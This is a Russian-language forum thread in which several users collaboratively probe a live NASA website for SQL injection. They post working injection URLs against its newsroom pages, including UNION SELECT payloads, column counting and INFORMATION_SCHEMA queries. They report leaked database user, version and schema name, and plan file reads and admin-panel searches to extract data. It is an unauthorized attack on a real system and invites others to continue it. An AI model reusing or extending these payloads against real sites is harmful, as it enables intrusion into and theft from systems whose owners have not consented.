Интересная ссылка, меня сразу заинтриговала: umbra.nascom.nasa.gov/eit/eit_guide/listings/anal.htm Я, безусловно, понимаю, что anal - это еще и дотошный, суетливый, и тем не менее. А вот SQL-inject. Обработать грамотно мне не хватило времени, прошу тех, кто возьмется - сообщить результаты. http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=679'+order+by+14-- P. S. order by здесь не при делах.
ордер бай в мускле ВСЕГДА при делах. http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'union+select+1,2,3,4,5,6,7/*
Я имел ввиду только то, что запрос с ORDER BY 14 не соответсвует реальному количеству столбцов \very SAD\.
а при чем тут вообще 14? че ты мне гонишь. order by 7 последний. учитывая что это мусуль то это и есь последний тк на 8 ошибка. --- строка потому что во-первых в это же место подставляется текст) во-вторых когда я пишу 'xa' то вижу xa
Благодаря ZaCo выявил следующее: USER() - web@localhost VERSION - 4.0.14-standard DATABASE() - eospso 2 ZaCO Почему ничего не выдает, там же - MySQL! http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6,7%20from%20INFORMATION_SCHEMA.COLUMNS/* И, что еще не понятнее - чем объясняется тот факт, что запрос с комментарием -- в конце не работает, а твой - пашет???
А я пишу 'xa' в параметр и не вижу ничего! Объясни, епожалуйста, если не лень, конечно про тип поподробнее.
я електу поставил, но не за тупость) а за ошибочное мнение. в пятой ветке мускля information_schema является системной таблицей. 1ten0.0net1 перебором - пробуешь строку, если прокатило то там можно попробовать поставить строковую функцию.
А почему не работает http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6,7%20from%20eospso/* Файлы там не читает, к mysql.user доступа нет. Коннект с локалхоста. Видимо, ловить оттуда нечего.
Да, версия, оказывается, много значит. А по поводу типа. Может я, конечно, совем, адвот, но: http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=679 Резулт: Выдает какой-то текст. http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff Резулт:пустота, не прокатило. Какой тогда перебор?
не работает потому что нет таблицы такой. я если честно не понимаю зачем все так тупо ищут уязвимости, а потом не знают что с ними делать. 1ten0.0net1 перечитай все а тему закрой
Не знаю как все, а я ищу, чтоюы научиться SQL-inject, поэтому зря ты так меня критикуешь. Хуже было бы, если бы я их даже находить не умел.
Вобщем, дохлый номер. Лоад файл не катит. Есть таблица news, но это фигня. Можно поперебирать, но скорее всего нифига не будет. Посмотри контент сайта, найди админку или какие-нить движки. Тогда можно будет выяснить возможные таблицы и из них выдрать что-нить.
ок, поищу. Пока что еще один инжект нашел http://eospso.gsfc.nasa.gov/newsroom/archive.php?y=2005&m=ff09'+union+select+1,DATABASE(),3,4/* Тут уже тип date есть. Только толка от этого нет.